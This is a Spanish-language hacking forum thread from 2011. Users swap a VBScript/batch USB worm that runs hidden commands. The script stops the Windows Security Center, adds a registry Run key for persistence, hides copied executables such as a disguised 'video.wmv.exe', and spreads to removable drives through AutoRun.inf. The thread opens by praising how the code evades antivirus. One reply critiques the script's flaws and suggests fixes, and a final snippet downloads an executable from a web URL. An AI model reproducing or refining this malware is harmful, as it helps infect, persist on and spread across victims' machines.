Igual la idea básica sirve de todos modos es la mejor que por lo menos yo conozco de ocultar por completo un código en linea de comando sin ser detectado por el av.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: Space.Medafighter.X en 22 Enero 2011, 21:50 PM
Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues.
Tampoco el código es una obra maestra...
Eso fue muy sin sentido...
En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f".
Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc.
Ciertamente no es complicado,
Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL.
Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.
Citarset cmd = createobject("wscript.shell" )
cmd.run "cmd /c start tuexepasadoadll.dll ", vbHide
Citarset cmd = createobject("wscript.shell" )y convertirlo con el ExeScript.
cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c :bucle ", vbHide
cmd.run "cmd /c call :copiausb ", vbHide
cmd.run "cmd /c :copiausb ", vbHide
cmd.run "cmd /c if exist E: call :creausb E ", vbHide
cmd.run "cmd /c if exist F: call :creausb F ", vbHide
cmd.run "cmd /c if exist G: call :creausb G ", vbHide
cmd.run "cmd /c if exist H: call :creausb H ", vbHide
cmd.run "cmd /c if exist I: call :creausb I ", vbHide
cmd.run "cmd /c if exist J: call :creausb J ", vbHide
cmd.run "cmd /c if exist K: call :creausb K ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c goto bucle ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
cmd.run "cmd /c :creausb ", vbHide
cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
Cita de: .:Snifer:. en 20 Enero 2011, 03:13 AM
Mira men si no funca edita tu mensaje no te cuesta nada y no hagas SPAM..
Para ocultar un exe puedes hacer con los siguiente.@echo off
attrib +r +h +s /s /d
no estoy haciendo spam estoy dando ejemplo ahh y tu code no me sirve creo yo no digo de ocultarlo sino que no se vea el dialogo en la pantalla pro igual gracias porque me sirve para hacer otra cosa
Cita de: boludoz en 20 Enero 2011, 01:48 AMno funciono
esta bien si digo esto?
@Echo off
@"%programfiles%\autoupate.exe" -h -download http://www.miweb.com/actualizacion.exe
@exit